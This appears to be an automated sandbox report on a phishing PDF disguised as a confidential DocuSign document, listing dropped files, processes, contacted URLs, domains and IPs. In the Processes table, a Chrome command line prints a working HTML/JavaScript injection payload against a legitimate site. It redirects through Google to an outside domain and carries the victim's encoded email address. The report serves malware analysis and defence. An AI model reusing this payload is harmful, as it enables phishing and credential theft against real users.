Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Securustechnologies - CONFIDENTIAL - DocuSign_lcipriano-168090-1.pdf
|
PDF document, version 1.4, 2 pages
|
initial sample
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\02c9eff7-0b5b-497d-b9f1-3363e2b8dbb5.tmp
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240318160400Z-240.bmp
|
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.4368
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.4368
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 19
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MSIe84b9.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A97z0z5w_7lkwhy_3dc.tmp
|
PDF document, version 1.6, 0 pages
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-03-18 17-03-56-061.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\100f6761-606a-4968-8eae-4c168cb7e343.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\89dde9e7-cfd6-4904-ae9d-fbf6ad0cb95e.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\9a2a81df-8341-4ae7-94af-16222d899c39.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\9b8924b2-c40d-4aca-a6a7-cb9677f734ff.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 18 15:04:00 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 18 15:04:00 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 18 15:04:00 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 18 15:04:00 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 18 15:03:59 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
Chrome Cache Entry: 231
|
ASCII text, with very long lines (1139)
|
downloaded
|
||
Chrome Cache Entry: 232
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 233
|
ASCII text, with very long lines (25629), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 234
|
ASCII text, with very long lines (13479)
|
downloaded
|
||
Chrome Cache Entry: 235
|
ASCII text, with very long lines (1139), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 236
|
ASCII text, with very long lines (18798)
|
downloaded
|
||
Chrome Cache Entry: 237
|
ASCII text, with very long lines (3456)
|
downloaded
|
||
Chrome Cache Entry: 238
|
Unicode text, UTF-8 text, with very long lines (17289), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 239
|
ASCII text, with very long lines (7567), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 240
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 241
|
Unicode text, UTF-8 text, with very long lines (8189)
|
downloaded
|
||
Chrome Cache Entry: 242
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 243
|
ASCII text, with very long lines (1836), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 244
|
Unicode text, UTF-8 text, with very long lines (29277), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 245
|
ASCII text, with no line terminators
|
dropped
|
||
Chrome Cache Entry: 246
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 247
|
ASCII text, with very long lines (463)
|
downloaded
|
||
Chrome Cache Entry: 248
|
ASCII text, with very long lines (30219)
|
downloaded
|
||
Chrome Cache Entry: 249
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 250
|
MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
|
downloaded
|
||
Chrome Cache Entry: 251
|
ASCII text, with very long lines (4610)
|
downloaded
|
||
Chrome Cache Entry: 252
|
HTML document, ASCII text, with very long lines (9462)
|
downloaded
|
||
Chrome Cache Entry: 253
|
ASCII text, with very long lines (65447)
|
downloaded
|
||
Chrome Cache Entry: 254
|
HTML document, ASCII text, with very long lines (541)
|
downloaded
|
||
Chrome Cache Entry: 255
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 256
|
ASCII text, with very long lines (925), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 257
|
ASCII text, with very long lines (9463), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 258
|
ASCII text, with very long lines (64350)
|
downloaded
|
||
Chrome Cache Entry: 259
|
ASCII text, with very long lines (2492)
|
downloaded
|
||
Chrome Cache Entry: 260
|
ASCII text, with very long lines (1218), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 261
|
ASCII text, with very long lines (1417)
|
downloaded
|
||
Chrome Cache Entry: 262
|
ASCII text, with very long lines (381)
|
downloaded
|
||
Chrome Cache Entry: 263
|
Unicode text, UTF-8 text, with very long lines (36997), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 264
|
JSON data
|
downloaded
|
||
Chrome Cache Entry: 265
|
MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
|
dropped
|
||
Chrome Cache Entry: 266
|
ASCII text, with very long lines (8171), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 267
|
Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 268
|
ASCII text, with very long lines (1222), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 269
|
ASCII text, with very long lines (754)
|
downloaded
|
||
Chrome Cache Entry: 270
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
Chrome Cache Entry: 271
|
ASCII text, with very long lines (46677), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 272
|
ASCII text, with very long lines (1222), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 273
|
Unicode text, UTF-8 text, with very long lines (38828), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 274
|
ASCII text, with very long lines (21099)
|
downloaded
|
||
Chrome Cache Entry: 275
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
Chrome Cache Entry: 276
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 277
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 278
|
Unicode text, UTF-8 (with BOM) text, with very long lines (65530), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 279
|
HTML document, ASCII text, with very long lines (25268)
|
downloaded
|
||
Chrome Cache Entry: 280
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 281
|
ASCII text, with very long lines (18523)
|
downloaded
|
||
Chrome Cache Entry: 282
|
ASCII text, with very long lines (1649), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 283
|
ASCII text, with very long lines (9846)
|
downloaded
|
||
Chrome Cache Entry: 284
|
JSON data
|
downloaded
|
||
Chrome Cache Entry: 285
|
HTML document, ASCII text, with very long lines (1238)
|
downloaded
|
||
Chrome Cache Entry: 286
|
ASCII text, with very long lines (2081)
|
downloaded
|
||
Chrome Cache Entry: 287
|
Web Open Font Format (Version 2), TrueType, length 51148, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 288
|
Unicode text, UTF-8 text, with very long lines (2412)
|
downloaded
|
||
Chrome Cache Entry: 289
|
ASCII text, with very long lines (14863), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 290
|
ASCII text, with very long lines (3224)
|
downloaded
|
||
Chrome Cache Entry: 291
|
ASCII text, with very long lines (6422), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 292
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 293
|
data
|
downloaded
|
||
Chrome Cache Entry: 294
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 295
|
ASCII text, with very long lines (6625), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 296
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 297
|
ASCII text, with very long lines (7397), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 298
|
ASCII text, with very long lines (17251)
|
downloaded
|
||
Chrome Cache Entry: 299
|
ASCII text, with very long lines (56398), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 300
|
Web Open Font Format (Version 2), TrueType, length 51092, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 301
|
ASCII text, with very long lines (9203), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 302
|
ASCII text, with very long lines (26160)
|
downloaded
|
||
Chrome Cache Entry: 303
|
ASCII text, with very long lines (501)
|
downloaded
|
||
Chrome Cache Entry: 304
|
ASCII text, with very long lines (40191)
|
downloaded
|
||
Chrome Cache Entry: 305
|
Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 306
|
ASCII text, with very long lines (4592)
|
downloaded
|
||
Chrome Cache Entry: 307
|
ASCII text, with very long lines (65455)
|
downloaded
|
||
Chrome Cache Entry: 308
|
ASCII text, with very long lines (531)
|
downloaded
|
||
Chrome Cache Entry: 309
|
Unicode text, UTF-8 text, with very long lines (37717)
|
downloaded
|
||
Chrome Cache Entry: 310
|
ASCII text, with very long lines (4163), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 311
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 312
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 313
|
ASCII text, with very long lines (1034)
|
downloaded
|
There are 126 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Securustechnologies - CONFIDENTIAL - DocuSign_lcipriano-168090-1.pdf
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2092 --field-trial-handle=1664,i,10230682309293579575,12993677390063109377,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://insightsoftware.com/watch-now/wfudtvqg/?h=%3Ch225><dETAILS%0a
open%0a onToGgle%20=%0a location%2f%2a%2a%2f=%27https:%2f%2fgoogle.com%2famp%2fs%2fjlaempireconstruction.com%2fwp%2fBaMZL%2f347412589%2fbGNpcHJpYW5vQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t'>Authenticating
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2336,i,2788931279288691974,6115915769995833056,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://insightsoftware.com/clausion-consolidation/
|
unknown
|
||
https://insightsoftware.com/resources/content-type/webinar/status/upcoming/
|
unknown
|
||
https://insightsoftware.com/sap/sap-business-one/
|
unknown
|
||
https://insightsoftware.com/solutions/non-profit/
|
unknown
|
||
https://insightsoftware.com/wp-content/uploads/2022/02/cropped-isw-favicon-32x32.png
|
unknown
|
||
https://insightsoftware.com/close-and-consolidation/
|
unknown
|
||
https://developers.google.com/recaptcha/docs/faq#localhost_support
|
unknown
|
||
https://insightsoftware.com/legal/corporate-social-responsibility-policy/
|
unknown
|
||
https://www.youtube.com/embed/
|
unknown
|
||
https://github.com/zloirock/core-js
|
unknown
|
||
https://insightsoftware.com/analytics-resource-center/
|
unknown
|
||
https://insightsoftware.com/mekko-graphics/
|
unknown
|
||
https://insightsoftware.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2
|
162.159.136.54
|
||
https://insightsoftware.com/contact-us/
|
unknown
|
||
https://insightsoftware.com/calumo/
|
unknown
|
||
https://www.instagram.com/insightsoftware/
|
unknown
|
||
https://insightsoftware.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
|
162.159.136.54
|
||
https://insightsoftware.com/simba/
|
unknown
|
||
https://insightsoftware.com/certent/equity-management-software/
|
unknown
|
||
https://insightsoftware.com/events/
|
unknown
|
||
about:blank
|
|||
https://insightsoftware.com/solutions/sec-reporting-software/
|
unknown
|
||
https://px.ads.linkedin.com/collect?
|
unknown
|
||
https://www.youtube.com
|
unknown
|
||
https://insightsoftware.com/wp-json/
|
unknown
|
||
https://insightsoftware.com/microsoft/microsoft-dynamics-gp/
|
unknown
|
||
https://insightsoftware.com/viareport/
|
unknown
|
||
https://insightsoftware.com/jet/
|
unknown
|
||
https://insightsoftware.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
|
162.159.136.54
|
||
https://insightsoftware.com/xmlrpc.php?rsd
|
unknown
|
||
https://insightsoftware.com/blog/category/articles/
|
unknown
|
||
https://insightsoftware.com/solutions/financial-reporting-software/
|
unknown
|
||
https://insightsoftware.com/da/watch-now/
|
unknown
|
||
https://support.google.com/recaptcha/#6175971
|
unknown
|
||
https://insightsoftware.com/solutions/commentary-narrative/
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/advanced-custom-fields-pro/assets/build/js/acf.min.js
|
unknown
|
||
https://insightsoftware.com/solutions/c-level-executive/
|
unknown
|
||
https://help.insightsoftware.com/s/
|
unknown
|
||
https://insightsoftware.com/wp-content/themes/insightsoftware/js/video-modal.js
|
162.159.136.54
|
||
https://insightsoftware.com/resources/content-type/whitepaper/
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/swx-widgets/functions/dlm/js/rg-awesome-public.min.js
|
unknown
|
||
https://support.google.com/recaptcha
|
unknown
|
||
https://insightsoftware.com/wp-content/themes/insightsoftware/css/components/forms.css?ver=1.0.9.9
|
162.159.136.54
|
||
https://insightsoftware.com/solutions/collaboration-sharing/
|
unknown
|
||
https://res.cloudinary.com/spiralyze/image/upload/f_auto/insightsoftware/3027/nick.webp
|
unknown
|
||
https://insightsoftware.com/wp-includes/js/jquery/ui/sortable.min.js?ver=1.13.2
|
162.159.136.54
|
||
https://insightsoftware.com/data-sources/other-sources/
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/advanced-custom-fields-pro/assets/build/js/acf-input.min.js?ver=6.2.7
|
162.159.136.54
|
||
https://insightsoftware.com/wp-content/plugins/responsive-youtube-video-player/public/js/wp-rvp-publ
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/jet-gravity-forms/public/js/jet-gravity-forms.js?ver=2.1.9.4
|
162.159.136.54
|
||
https://insightsoftware.com/self-service-reporting/
|
unknown
|
||
https://insightsoftware.com/logi-symphony/
|
unknown
|
||
https://insightsoftware.com/onestream/
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/swx-widgets/functions/dlm/js/rg-awesome-public-resources.min.js?ver=0.2
|
162.159.136.54
|
||
https://insightsoftware.com/solutions/construction/
|
unknown
|
||
https://insightsoftware.com/visma/
|
unknown
|
||
https://schema.org
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/advanced-custom-fields-pro/assets/build/js/acf.min.js?ver=6.2.7
|
162.159.136.54
|
||
https://insightsoftware.com/about/
|
unknown
|
||
https://insightsoftware.com/solutions/qlik-integration/
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switche
|
unknown
|
||
https://insightsoftware.com/lawson/
|
unknown
|
||
https://insightsoftware.com/solutions/budgeting/
|
unknown
|
||
https://insightsoftware.com/certent/
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/swx-widgets/functions/dlm/js/rg-awesome-public.min.js?ver=0.2
|
162.159.136.54
|
||
https://www.google.com/favicon.ico
|
142.250.65.164
|
||
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
|
unknown
|
||
https://insightsoftware.com/excel-resources/
|
unknown
|
||
https://insightsoftware.com/wp-content/themes/insightsoftware/js/vendor/cookie.min.js
|
162.159.136.54
|
||
https://insightsoftware.com/terms-of-use-privacy-policy/
|
unknown
|
||
https://insightsoftware.com/solutions/esg-reporting-software/
|
unknown
|
||
http://tools.ietf.org/html/rfc1950
|
unknown
|
||
https://insightsoftware.com/#organization
|
unknown
|
||
https://insightsoftware.com/wp-includes/js/dist/a11y.min.js?ver=7032343a947cfccf5608
|
162.159.136.54
|
||
https://insightsoftware.com/solutions/data-warehousing/
|
unknown
|
||
https://insightsoftware.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3ca
|
162.159.136.54
|
||
https://insightsoftware.com/oracle/oracle-erp-cloud/
|
unknown
|
||
https://insightsoftware.com/logi-analytics/logi-symphony/
|
unknown
|
||
https://insightsoftware.com/remote-reporting/
|
unknown
|
||
https://insightsoftware.com/erp-software/
|
unknown
|
||
https://github.com/js-cookie/js-cookie
|
unknown
|
||
https://cdn.dreamdata.cloud/scripts/analytics/v1/dreamdata.min.js
|
unknown
|
||
https://insightsoftware.com/wp-content/uploads/2022/02/cropped-isw-favicon-180x180.png
|
unknown
|
||
https://insightsoftware.com/solutions/financial-services/
|
unknown
|
||
https://geoip-js.com/js/apis/geoip2/v2.1/geoip2.js?ver=6.4.3
|
172.64.154.146
|
||
https://insightsoftware.com/careers/
|
unknown
|
||
https://insightsoftware.com/es/watch-now/
|
unknown
|
||
https://insightsoftware.com/tax-compliance/
|
unknown
|
||
https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
|
104.19.178.52
|
||
https://insightsoftware.com/resources/content-type/research-report/
|
unknown
|
||
https://insightsoftware.com/solutions/operations/
|
unknown
|
||
https://insightsoftware.com/legal/terms-of-use/
|
unknown
|
||
https://insightsoftware.com/solutions/esef-reporting-software/
|
unknown
|
||
https://insightsoftware.com/idl/idl-konsis/
|
unknown
|
||
https://insightsoftware.com/solutions/retail/
|
unknown
|
||
https://res.cloudinary.com/spiralyze/image/upload/v1705575428/insightsoftware/3027/otis-grey_2.svg
|
unknown
|
||
https://insightsoftware.com/atlas/
|
unknown
|
||
https://res.cloudinary.com/spiralyze/image/upload/v1666866020/Insightsoftware/7017-product-page/You_
|
unknown
|
||
https://www.gstatic.c..?/recaptcha/releases/YurWEBlMIwR4EqFPncmQTkxQ/recaptcha__.
|
unknown
|
||
https://insightsoftware.com/wp-content/plugins/wp-rocket/assets/js/heartbeat.js?ver=3.15.8.1
|
162.159.136.54
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
jsdelivr.map.fastly.net
|
151.101.129.229
|
||
k8s-mutiny-privatea-b7eaf9f835-63806838.us-east-1.elb.amazonaws.com
|
184.73.158.234
|
||
youtube-ui.l.google.com
|
142.251.41.14
|
||
google.com
|
142.250.72.110
|
||
scontent.xx.fbcdn.net
|
31.13.71.7
|
||
insightsoftware.com
|
162.159.136.54
|
||
js.chilipiper.com
|
34.111.73.67
|
||
geoip-js.com
|
172.64.154.146
|
||
www.google.com
|
142.251.35.164
|
||
unpkg.com
|
104.16.124.175
|
||
cdn.cookielaw.org
|
104.19.178.52
|
||
geolocation.onetrust.com
|
172.64.155.119
|
||
client-registry.mutinycdn.com
|
unknown
|
||
cdn.jsdelivr.net
|
unknown
|
||
connect.facebook.net
|
unknown
|
||
player.vimeo.com
|
unknown
|
||
www.youtube.com
|
unknown
|
||
api-v2.mutinyhq.io
|
unknown
|
There are 8 hidden domains, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
34.111.73.67
|
js.chilipiper.com
|
United States
|
||
104.19.177.52
|
unknown
|
United States
|
||
151.101.129.229
|
jsdelivr.map.fastly.net
|
United States
|
||
192.168.2.5
|
unknown
|
unknown
|
||
162.159.137.54
|
unknown
|
United States
|
||
142.251.41.14
|
youtube-ui.l.google.com
|
United States
|
||
104.18.32.137
|
unknown
|
United States
|
||
104.16.124.175
|
unpkg.com
|
United States
|
||
184.73.158.234
|
k8s-mutiny-privatea-b7eaf9f835-63806838.us-east-1.elb.amazonaws.com
|
United States
|
||
3.219.243.226
|
unknown
|
United States
|
||
104.19.178.52
|
cdn.cookielaw.org
|
United States
|
||
142.250.81.228
|
unknown
|
United States
|
||
172.64.155.119
|
geolocation.onetrust.com
|
United States
|
||
162.159.136.54
|
insightsoftware.com
|
United States
|
||
23.47.168.24
|
unknown
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
172.64.154.146
|
geoip-js.com
|
United States
|
||
31.13.71.7
|
scontent.xx.fbcdn.net
|
Ireland
|
||
142.250.72.110
|
google.com
|
United States
|
||
142.250.65.164
|
unknown
|
United States
|
||
142.251.35.164
|
www.google.com
|
United States
|
